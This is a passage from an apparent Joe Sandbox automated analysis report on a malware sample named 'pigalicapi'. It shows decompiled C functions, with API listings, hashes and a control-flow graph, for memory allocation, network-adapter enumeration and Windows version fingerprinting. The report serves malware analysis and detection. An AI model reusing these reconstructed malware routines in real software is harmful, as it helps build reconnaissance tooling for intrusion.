                                                                                                                                                                                                                                                                                          						if(_t35 != 0) {
                                                                                                                                                                                                                                                                                          							E00815DE2(_t35);
                                                                                                                                                                                                                                                                                          							_t77 = _t77 + 4;
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_t71 + 4)) = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_push(_t71);
                                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_t71 + 8)) = 0;
                                                                                                                                                                                                                                                                                          						E008159DB();
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					E00804700();
                                                                                                                                                                                                                                                                                          					return _t66;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					MessageBoxA(0, "NtAllocateVirtualMemory - Fail", 0, 0);
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x0080a0b0
                                                                                                                                                                                                                                                                                          0x0080a0bf
                                                                                                                                                                                                                                                                                          0x0080a0c9
                                                                                                                                                                                                                                                                                          0x0080a0cf
                                                                                                                                                                                                                                                                                          0x0080a0d1
                                                                                                                                                                                                                                                                                          0x0080a0d6
                                                                                                                                                                                                                                                                                          0x0080a0dc
                                                                                                                                                                                                                                                                                          0x0080a0df
                                                                                                                                                                                                                                                                                          0x0080a0e4
                                                                                                                                                                                                                                                                                          0x0080a0e5
                                                                                                                                                                                                                                                                                          0x0080a0e7
                                                                                                                                                                                                                                                                                          0x0080a0eb
                                                                                                                                                                                                                                                                                          0x0080a0ef
                                                                                                                                                                                                                                                                                          0x0080a0f7
                                                                                                                                                                                                                                                                                          0x0080a0fc
                                                                                                                                                                                                                                                                                          0x0080a101
                                                                                                                                                                                                                                                                                          0x0080a11c
                                                                                                                                                                                                                                                                                          0x0080a11e
                                                                                                                                                                                                                                                                                          0x0080a122
                                                                                                                                                                                                                                                                                          0x0080a124
                                                                                                                                                                                                                                                                                          0x0080a142
                                                                                                                                                                                                                                                                                          0x0080a148
                                                                                                                                                                                                                                                                                          0x0080a152
                                                                                                                                                                                                                                                                                          0x0080a155
                                                                                                                                                                                                                                                                                          0x0080a156
                                                                                                                                                                                                                                                                                          0x0080a156
                                                                                                                                                                                                                                                                                          0x0080a124
                                                                                                                                                                                                                                                                                          0x0080a15c
                                                                                                                                                                                                                                                                                          0x0080a172
                                                                                                                                                                                                                                                                                          0x0080a174
                                                                                                                                                                                                                                                                                          0x0080a17a
                                                                                                                                                                                                                                                                                          0x0080a17f
                                                                                                                                                                                                                                                                                          0x0080a185
                                                                                                                                                                                                                                                                                          0x0080a187
                                                                                                                                                                                                                                                                                          0x0080a189
                                                                                                                                                                                                                                                                                          0x0080a18b
                                                                                                                                                                                                                                                                                          0x0080a18d
                                                                                                                                                                                                                                                                                          0x0080a190
                                                                                                                                                                                                                                                                                          0x0080a195
                                                                                                                                                                                                                                                                                          0x0080a198
                                                                                                                                                                                                                                                                                          0x0080a198
                                                                                                                                                                                                                                                                                          0x0080a19a
                                                                                                                                                                                                                                                                                          0x0080a19a
                                                                                                                                                                                                                                                                                          0x0080a19d
                                                                                                                                                                                                                                                                                          0x0080a19f
                                                                                                                                                                                                                                                                                          0x0080a1a2
                                                                                                                                                                                                                                                                                          0x0080a1a7
                                                                                                                                                                                                                                                                                          0x0080a1aa
                                                                                                                                                                                                                                                                                          0x0080a1aa
                                                                                                                                                                                                                                                                                          0x0080a1ad
                                                                                                                                                                                                                                                                                          0x0080a1ae
                                                                                                                                                                                                                                                                                          0x0080a1b1
                                                                                                                                                                                                                                                                                          0x0080a1b6
                                                                                                                                                                                                                                                                                          0x0080a1b9
                                                                                                                                                                                                                                                                                          0x0080a1c6
                                                                                                                                                                                                                                                                                          0x0080a103
                                                                                                                                                                                                                                                                                          0x0080a10b
                                                                                                                                                                                                                                                                                          0x0080a119
                                                                                                                                                                                                                                                                                          0x0080a119

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 00804A40: GetCurrentThreadId.KERNEL32 ref: 00804A7B
                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(RICHED20.DLL), ref: 0080A0C9
                                                                                                                                                                                                                                                                                          • MessageBoxA.USER32 ref: 0080A10B
                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00003000,00000040), ref: 0080A174
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Library$CurrentFreeLoadMessageThread
                                                                                                                                                                                                                                                                                          • String ID: NtAllocateVirtualMemory - Fail$RICHED20.DLL
                                                                                                                                                                                                                                                                                          • API String ID: 2057254942-2284438529
                                                                                                                                                                                                                                                                                          • Opcode ID: 2b40c7623d3cf9f45a1247bbcadacdc81391662fec114104e2e96b24818a9cda
                                                                                                                                                                                                                                                                                          • Instruction ID: d1bf59522fd29670f719cf6429d2945e29149af0d5c0b59f4a7f80d80ce2e8af
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b40c7623d3cf9f45a1247bbcadacdc81391662fec114104e2e96b24818a9cda
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B31C1B26043019FD714EF69EC8696B77D9FF84320F04463EF596D7282E630E94587A2
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                          			E04009F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t59;
                                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                                          					if(_a8 > 5) {
                                                                                                                                                                                                                                                                                          						asm("cdq");
                                                                                                                                                                                                                                                                                          						_t59 = E040097A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                                                          						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                                          						_v28 = _t59;
                                                                                                                                                                                                                                                                                          						_v12 = _v28;
                                                                                                                                                                                                                                                                                          						if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          							_v16 = _v12;
                                                                                                                                                                                                                                                                                          							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                                          							_push( &_v20);
                                                                                                                                                                                                                                                                                          							_t64 = _v12;
                                                                                                                                                                                                                                                                                          							_push(_t64); // executed
                                                                                                                                                                                                                                                                                          							L0400B1DA(); // executed
                                                                                                                                                                                                                                                                                          							if(_t64 == 0) {
                                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                                          								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                                          									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                                          										E04007B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                                          										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                          										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                                          										_v12 =  *_v12;
                                                                                                                                                                                                                                                                                          										_v8 = 1;
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								 *_a12 = _v24;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v32 = _v16;
                                                                                                                                                                                                                                                                                          							E040097C0(_v32); // executed
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                                                                          0x04009f76
                                                                                                                                                                                                                                                                                          0x04009f81
                                                                                                                                                                                                                                                                                          0x04009f87
                                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                                          0x04009f94
                                                                                                                                                                                                                                                                                          0x04009fad
                                                                                                                                                                                                                                                                                          0x04009fb2
                                                                                                                                                                                                                                                                                          0x04009fb5
                                                                                                                                                                                                                                                                                          0x04009fbb
                                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                                          0x04009fcb
                                                                                                                                                                                                                                                                                          0x04009fe0
                                                                                                                                                                                                                                                                                          0x04009fe6
                                                                                                                                                                                                                                                                                          0x04009fe7
                                                                                                                                                                                                                                                                                          0x04009fea
                                                                                                                                                                                                                                                                                          0x04009feb
                                                                                                                                                                                                                                                                                          0x04009ff2
                                                                                                                                                                                                                                                                                          0x04009ff4
                                                                                                                                                                                                                                                                                          0x04009ffb
                                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                                          0x0400a034
                                                                                                                                                                                                                                                                                          0x0400a039
                                                                                                                                                                                                                                                                                          0x0400a048
                                                                                                                                                                                                                                                                                          0x0400a050
                                                                                                                                                                                                                                                                                          0x0400a053
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a05e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                                          0x0400a06b
                                                                                                                                                                                                                                                                                          0x0400a072
                                                                                                                                                                                                                                                                                          0x0400a077
                                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                                          0x0400a080

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1318000056-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                                          • Instruction ID: 97f005e152f21f2c2f7fd10924b0caa403664ba6d1ad8a9a516f1bf18f754b30
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B931FBB5E00209EFEB04CF98C494AEEB7B5EF48308F10C169E909A7390D735AA45CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 204 4008f80-4008f94 205 4008f9a-4008f9e 204->205 206 400927b-4009281 204->206 205->206 207 4008fa4-4008fa8 205->207 207->206 208 4008fae-4008fff call 4007d20 * 3 GetVersionExA 207->208 215 4009005-4009016 GetSystemInfo 208->215 216 4009266-400926a 208->216 218 4009115-400911c 215->218 219 400901c-4009023 215->219 216->206 217 400926c-4009275 lstrcatA 216->217 217->206 220 4009210-4009217 call 4009290 218->220 221 4009122-4009129 218->221 222 4009042-4009049 219->222 223 4009025-400903d lstrcatA 219->223 237 4009228-4009237 lstrlenA 220->237 238 4009219-4009222 lstrcatA 220->238 226 4009174-400917b 221->226 227 400912b-4009132 221->227 224 4009068-400906f 222->224 225 400904b-4009063 lstrcatA 222->225 229 4009110 223->229 224->229 231 4009075-400907c 224->231 225->229 232 40091c3-40091ca 226->232 233 400917d-4009184 226->233 234 4009134-400914c lstrcatA 227->234 235 400914e-4009155 227->235 229->220 240 40090a1-40090ab GetSystemMetrics 231->240 241 400907e-4009085 231->241 232->220 244 40091cc-40091d3 232->244 242 40091a0-40091a7 233->242 243 4009186-400919e lstrcatA 233->243 236 400916f 234->236 235->236 239 4009157-4009169 lstrcatA 235->239 236->220 245 4009259-4009263 lstrlenA 237->245 246 4009239-4009253 lstrcatA * 2 237->246 238->237 239->236 248 40090c7-40090d1 GetSystemMetrics 240->248 249 40090ad-40090c5 lstrcatA 240->249 241->240 247 4009087-400909f lstrcatA 241->247 250 40091c1 242->250 251 40091a9-40091bb lstrcatA 242->251 243->250 252 40091d5-40091ed lstrcatA 244->252 253 40091ef-40091f6 244->253 245->216 246->245 247->229 254 40090d3-40090eb lstrcatA 248->254 255 40090ed-40090f6 248->255 249->229 250->220 251->250 252->220 253->220 256 40091f8-400920a lstrcatA 253->256 254->229 255->229 257 40090f8-400910a lstrcatA 255->257 256->220 257->229
                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                                          				signed int _v50;
                                                                                                                                                                                                                                                                                          				signed short _v52;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                                          					L45:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                                          					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                                          					E04007D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                                          					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                                          						L43:
                                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						goto L45;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                                          					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                                          						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                                          								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                                          									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                          											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                                          												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                                          											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                                          											 *_a12 = 8;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                                          										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                                          										 *_a12 = 9;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                                          									 *_a12 = 7;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L38:
                                                                                                                                                                                                                                                                                          						if(E04009290() != 0) {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                                          						goto L43;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                                          						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                                          									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                                          										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                                          											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                                          												 *_a12 = 4;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                                          											 *_a12 = 6;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                                          										 *_a12 = 5;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                                          									 *_a12 = 3;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                                          							 *_a12 = 2;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                                          						 *_a12 = 1;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x04008f89
                                                                                                                                                                                                                                                                                          0x04008f94
                                                                                                                                                                                                                                                                                          0x0400927b
                                                                                                                                                                                                                                                                                          0x04009281
                                                                                                                                                                                                                                                                                          0x04008fae
                                                                                                                                                                                                                                                                                          0x04008fce
                                                                                                                                                                                                                                                                                          0x04008fd6
                                                                                                                                                                                                                                                                                          0x04008fe8
                                                                                                                                                                                                                                                                                          0x04008fff
                                                                                                                                                                                                                                                                                          0x04009266
                                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                                          0x04009009
                                                                                                                                                                                                                                                                                          0x04009016
                                                                                                                                                                                                                                                                                          0x0400911c
                                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                                          0x0400917b
                                                                                                                                                                                                                                                                                          0x040091ca
                                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                                          0x040091f6
                                                                                                                                                                                                                                                                                          0x04009201
                                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                                          0x040091d5
                                                                                                                                                                                                                                                                                          0x040091de
                                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                                          0x0400917d
                                                                                                                                                                                                                                                                                          0x04009184
                                                                                                                                                                                                                                                                                          0x040091a7
                                                                                                                                                                                                                                                                                          0x040091b2
                                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                                          0x04009186
                                                                                                                                                                                                                                                                                          0x0400918f
                                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                                          0x040091c1
                                                                                                                                                                                                                                                                                          0x0400912b
                                                                                                                                                                                                                                                                                          0x04009132
                                                                                                                                                                                                                                                                                          0x04009155
                                                                                                                                                                                                                                                                                          0x04009160
                                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                                          0x04009134
                                                                                                                                                                                                                                                                                          0x0400913d
                                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                                          0x0400916f
                                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                                          0x04009210
                                                                                                                                                                                                                                                                                          0x04009217
                                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                                          0x04009237
                                                                                                                                                                                                                                                                                          0x04009242
                                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                                          0x04009023
                                                                                                                                                                                                                                                                                          0x04009049
                                                                                                                                                                                                                                                                                          0x0400906f
                                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                                          0x040090ab
                                                                                                                                                                                                                                                                                          0x040090d1
                                                                                                                                                                                                                                                                                          0x040090f6
                                                                                                                                                                                                                                                                                          0x04009101
                                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                                          0x040090d3
                                                                                                                                                                                                                                                                                          0x040090dc
                                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                                          0x040090ad
                                                                                                                                                                                                                                                                                          0x040090b6
                                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                                          0x04009087
                                                                                                                                                                                                                                                                                          0x04009090
                                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                                          0x0400904b
                                                                                                                                                                                                                                                                                          0x04009054
                                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                                          0x04009025
                                                                                                                                                                                                                                                                                          0x0400902e
                                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04009110

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinXP), ref: 04009054
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Vista), ref: 0400913D
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 04009160
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 0400918F
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win7), ref: 040091B2
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 040091DE
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win8), ref: 04009201
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
